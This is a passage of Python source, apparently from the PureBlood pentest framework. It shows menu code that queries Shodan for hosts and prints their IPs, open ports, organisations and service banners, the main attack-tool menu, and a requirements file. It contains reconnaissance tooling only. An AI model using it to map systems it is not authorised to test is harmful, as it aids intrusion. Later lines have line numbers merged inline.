            shodan_search_query = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
            SHODAN_API_KEY = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
            shodan_search_output_filename = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
            if '.txt' not in shodan_search_output_filename:
                shodan_search_output_filename = shodan_search_output_filename + '.txt'
            else:
                shodan_search_output_filename = shodan_search_output_filename
        shodan_search_output = open('outputs/web_pentest/shodan/' + shodan_search_output_filename, 'a+')
        shodan_search_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
        wp_shodan_search = cweb_pentest.shodan_search(shodan_search_query, SHODAN_API_KEY)
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        print ('------------------------------.\n{1}[{2}#{1}] {3}- {4}Results Found: {5}|\n------------------------------.{0}'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
        shodan_search_output.write('\n------------------------------.\n[#] - Results Found: {5}|\n------------------------------.\n'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
        for i in wp_shodan_search['matches']:
            try:
                print ("""{6}[{7}#{6}] {8}- {9}Timestamp:{10} {0}
{6}[{7}+{6}] {8}- {9}IP:{10} {1}
{6}[{7}+{6}] {8}- {9}Port:{10} {2}
{6}[{7}+{6}] {8}- {9}OS:{10} {3}
{6}[{7}+{6}] {8}- {9}Hostnames:{10} {4}
{6}[{7}+{6}] {8}- {9}Data:{10}
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
                shodan_search_output.write("""[#] - Timestamp: {0}
[+] - IP: {1}
[+] - Port: {2}
[+] - OS: {3}
[+] - Hostnames: {4}
[+] - Data:
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
            except:
                pass
        shodan_search_output.write('\n\n')
        shodan_search_output.close()
        print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_search_output_filename)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest()
    elif choice == 17:
        if sys.version_info[0] == 3:
            shodan_host = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
            SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
            shodan_host_lookup_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
            if '.txt' not in shodan_host_lookup_output_filename:
                shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
            else:
                shodan_host_lookup_output_filename = shodan_host_lookup_output_filename
        if sys.version_info[0] == 2:
            # Python 2: use raw_input() for every prompt; input() would eval() the typed text.
            shodan_host = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
            SHODAN_API_KEY = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
            shodan_host_lookup_output_filename = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
            if '.txt' not in shodan_host_lookup_output_filename:
                shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
            else:
                shodan_host_lookup_output_filename = shodan_host_lookup_output_filename
        shodan_host_lookup_output = open('outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename, 'a+')
        shodan_host_lookup_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
        wp_shodan_host_lookup = cweb_pentest.shodan_host_lookup(shodan_host, SHODAN_API_KEY)
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        print ("""--------------------------.\n{1}[{2}#{1}] {3}- {4}General Information:{0}|\n--------------------------.
{1}[{2}#{1}] {3}- {4}IP:{0} {5}
{1}[{2}#{1}] {3}- {4}Ports:{0} {6}
{1}[{2}#{1}] {3}- {4}Tags:{0} {7}
{1}[{2}#{1}] {3}- {4}City:{0} {8}
{1}[{2}#{1}] {3}- {4}Country:{0} {9}
{1}[{2}#{1}] {3}- {4}Organization:{0} {10}
{1}[{2}#{1}] {3}- {4}ISP:{0} {11}
{1}[{2}#{1}] {3}- {4}Last Update:{0} {12}
{1}[{2}#{1}] {3}- {4}Hostnames:{0} {13}
{1}[{2}#{1}] {3}- {4}ASN:{0} {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
        shodan_host_lookup_output.write("""--------------------------.\n[#] - General Information:|\n--------------------------.
2551 | [#] - IP: {5} 2552 | [#] - Ports: {6} 2553 | [#] - Tags: {7} 2554 | [#] - City: {8} 2555 | [#] - Country: {9} 2556 | [#] - Organization: {10} 2557 | [#] - ISP: {11} 2558 | [#] - Last Update: {12} 2559 | [#] - Hostnames: {13} 2560 | [#] - ASN: {14} 2561 | """.format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A'))) 2562 | print ('------------------------.\n{1}[{2}#{1}] {3}- {4}Services / Banner:|\n------------------------.{0}'.format(reset, blue, green, yellow, cyan)) 2563 | shodan_host_lookup_output.write('\n------------------------.\n[#] - Services / Banner:|\n------------------------.\n'.format(reset, blue, green, yellow, cyan)) 2564 | for i in wp_shodan_host_lookup['data']: 2565 | print ("""{1}[{2}#{1}] {3}- {4}Timestamp:{0} {5} 2566 | {1}[{2}+{1}] {3}- {4}Port:{0} {6} 2567 | {1}[{2}+{1}] {3}- {4}Transport:{0} {7} 2568 | {1}[{2}+{1}] {3}- {4}Data:{0} 2569 | {8} 2570 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data'])) 2571 | shodan_host_lookup_output.write("""[#] - Timestamp: {5} 2572 | [+] - Port: {6} 2573 | [+] - Transport: {7} 2574 | [+] - Data: 2575 | {8} 2576 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data'])) 2577 | shodan_host_lookup_output.write('\n\n') 2578 | shodan_host_lookup_output.close() 2579 | print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + 
shodan_host_lookup_output_filename) 2580 | print (reset) 2581 | print ('{0}='.format(red) * int(sizex)) 2582 | web_pentest() 2583 | elif choice == 90: 2584 | main() 2585 | elif choice == 95: 2586 | print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan)) 2587 | if sys.version_info[0] == 3: 2588 | target = str(input('{0}PureBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red))) 2589 | if sys.version_info[0] == 2: 2590 | target = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red))) 2591 | if '://' in target: 2592 | ohostname = target.replace('https://', '').replace('http://', '') 2593 | else: 2594 | ohostname = target 2595 | web_pentest_output = ohostname + '-' + month + mday + '.txt' 2596 | web_pentest_outputfile = open('outputs/web_pentest/' + web_pentest_output, 'a+') 2597 | web_pentest_outputfile.write('\n\n\n[#] - ' + month + ' ' + mday + ' ' + current_time + '\n') 2598 | set_target(target, 1) 2599 | elif choice == 99: 2600 | print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output) 2601 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2602 | sys.exit() 2603 | else: 2604 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow)) 2605 | time.sleep(2) 2606 | print ('') 2607 | web_pentest() 2608 | 2609 | 2610 | 2611 | def main(): 2612 | print ("""{3}[ {5}PureBlood Menu {3}] 2613 | 2614 | {2}01{3}) {5}Web Pentest / Information Gathering 2615 | {2}02{3}) {5}Web Application Attack 2616 | {2}03{3}) {5}Generator 2617 | {2}99{3}) {5}Exit 2618 | {0}""".format(reset, red, green, blue, yellow, cyan)) 2619 | if sys.version_info[0] == 3: 2620 | try: 2621 | choice = int(input('{0}PureBlood{1}> {2}'.format(green, blue, cyan))) 2622 | except KeyboardInterrupt: 2623 | print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2624 | 
sys.exit() 2625 | except ValueError: 2626 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 2627 | time.sleep(2) 2628 | print ('') 2629 | main() 2630 | elif sys.version_info[0] == 2: 2631 | try: 2632 | choice = int(raw_input('{0}PureBlood{1}> {2}'.format(green, blue, cyan))) 2633 | except KeyboardInterrupt: 2634 | print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2635 | sys.exit() 2636 | except ValueError: 2637 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 2638 | time.sleep(2) 2639 | print ('') 2640 | main() 2641 | if choice == 1: 2642 | web_pentest() 2643 | elif choice == 2: 2644 | web_application_attack() 2645 | elif choice == 3: 2646 | generator() 2647 | elif choice == 99: 2648 | print ('{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2649 | sys.exit() 2650 | else: 2651 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow)) 2652 | time.sleep(2) 2653 | print ('') 2654 | main() 2655 | 2656 | 2657 | 2658 | if __name__ == '__main__': 2659 | create_directories() 2660 | clear() 2661 | banner() 2662 | main() 2663 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | colorama 2 | requests 3 | python-whois 4 | dnspython 5 | bs4 6 | shodan 7 | --------------------------------------------------------------------------------